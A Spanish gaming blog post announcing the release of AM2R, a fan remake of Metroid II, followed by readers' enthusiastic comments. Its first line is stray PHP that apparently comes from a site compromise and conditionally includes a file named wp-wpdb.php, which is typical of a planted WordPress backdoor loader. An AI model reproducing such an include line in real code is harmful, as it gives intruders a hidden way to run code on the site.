if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Remake de Metroid II Return of Samus ¡Ya disponible! – La Fortaleza de LeChuck

Remake de Metroid II Return of Samus ¡Ya disponible!

Como sabéis, hoy mismo la saga Metroid cumple 30 años, ya que el primer título de la saga salió en la Famicom japonesa el 6 de agosto de 1986, y para celebrarlo, nada mejor que jugar este remake realizado con cariño y mimo por un fan. Según podíamos comprobar en la demo que ya estaba disponible, se ha hecho un magnífico trabajo, rehaciendo este Metroid II Return of Samus de Game Boy con gráficos más propios de Game Boy Advance, al más puro estilo Metroid Zero Mission (remake oficial para esta consola del primer Metroid de NES).

metroid II return of samus remake

Este remake, que lleva en desarrollo desde hace 8 años, ya está disponible para poder jugar desde un PC en su versión 1.0. Aunque así sea y esté completo, su creador asegura en su blog que seguirá soportando el juego con nuevas mejoras y características. De momento, toca disfrutar de algo que llevarse a la boca por el 30 aniversario de Metroid, ya que Nintendo no ha preparado nada… Bueno, sí, Metroid Prime Federation Force…

Descargar Project AM2R desde el blog oficial

metroid 2 Project AM2R

Aquí podéis ver un vídeo con el resultado final del título, este es el tráiler del remake de Metroid II Return of Samus.

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

3 comentarios

  1. Acabo de terminar el juego. Mas de 6 horas (segun el contador, yo creo que son unas cuantas mas xD), en modo dificil y con el 92% de objetos.
    Solo decir que es una maravilla, hacia tiempo que no me enganchaba tanto un juego. Adoro esta maldita saga y este juego ha conseguido paliar un poco mis ansias por nuevos Metroid.
    El remake esta mucho mas currado de lo que lo estaba el Zero Mission respecto del de NES. Nuevas zonas, nuevos enemigos, muy desafiante (al menos en modo dificil), ambientacion de infarto y OST cojonuda.
    Aunque el original de GameBoy es muy disfrutable, mas con un buen mapa de internet, hay que reconocer que no ha envejecido demasiado bien y es muy comun ver gente que no se ha pasado esta entrega ha pesar de gustarles mucho la saga. Por lo tanto, este remake es una oportunidad perfecta para vivir uno de los capitulos mas importantes e interesantes de la gran Samus Aran.

    Nintendo, ojala nos oigas y nos brindes nuevos Metroids a la altura de la saga.

    1. Olé! Le has dado caña, yo solo lo he probado a falta de darle que será próximamente, y la verdad es que estoy de acuerdo contigo, se respira muy Metroid, se nota que llevan tiempo cocinándolo y ha sido un fan quien lo ha hecho.

      Sería genial que Nintendo volviera a lanzar Metroids de verdad aunque sean en 2D. Los Prime están bien, pero si no quieren darle tanto presupuesto, ok, uno 2D en 3DS o NX y nosotros felices ¿Verdad? Un saludo y gracias por comentar Mikel

      1. Totalmente de acuerdo. Aunque desearia una nueva entrega de Prime, una entrega en 2D tradicional para portatiles o sobremesa nos encantaria a todos. Al igual que hacen con Zelda o Mario, los juegos de mecanicas 2D para portatiles y los 3D en sobremesa.

        Sobre el remake de Metroid 2, como digo, es una obra maestra, mejor que Zero Mission y casi o mejor incluso que Fusion que ya es decir. Si has jugado al Metroid 2 original, veras los cambios que hay en este remake, algunos muy llamativos. Si no lo has jugado, es la mejor forma de vivir la aventura de Samus en SR388 en busca de los Metroids. Es el unico juego de la saga en el que la raza Metroid tiene tanto protagonismo, podemos ver la cadena evolutiva y enfrentarnos a un sin fin de ellos.

        Graficamente, ambientacion, jugablemente, la banda sonora, giños a otros juego de la saga, me ha maravillado este AM2R. Solo puedo decirte que lo juegues, que es la mejor forma de celebrar el 30 aniversario de esta maravillosa saga.

        La banda sonora es muy del estilo de los Prime, remezcla temas del juego original y de otros Metroids como los Prime.
        Esta cancion sinceramente me encanta, si no me equivoco, esta basado en el tema de Torvus de MP2.
        https://www.youtube.com/watch?v=QUwI_rYJ-TU

        Un saludo!!!

Dejar un comentario